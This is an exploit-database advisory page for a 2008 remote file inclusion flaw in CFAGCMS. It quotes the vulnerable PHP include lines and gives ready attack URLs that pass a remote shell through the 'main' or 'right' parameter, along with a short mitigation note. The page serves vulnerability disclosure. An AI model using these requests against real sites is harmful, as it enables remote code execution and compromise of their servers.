header-logo
Suggest Exploit
vendor:
CFAGCMS
by:
BeyazKurt - Bey4zKurt@Gmail.Com
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: CFAGCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CFAGCMS

CFAGCMS is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

To mitigate this vulnerability, user input must be validated and filtered before being used in filesystem operations.
Source

Exploit-DB raw data:

Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQÄ°PTAR!
Siyasetle ilgili bişi söliyimmi :p
 
FENERBAHÇEE (H)

# milw0rm.com [2008-12-14]

Navigation

Suggest Exploit

Services By CQR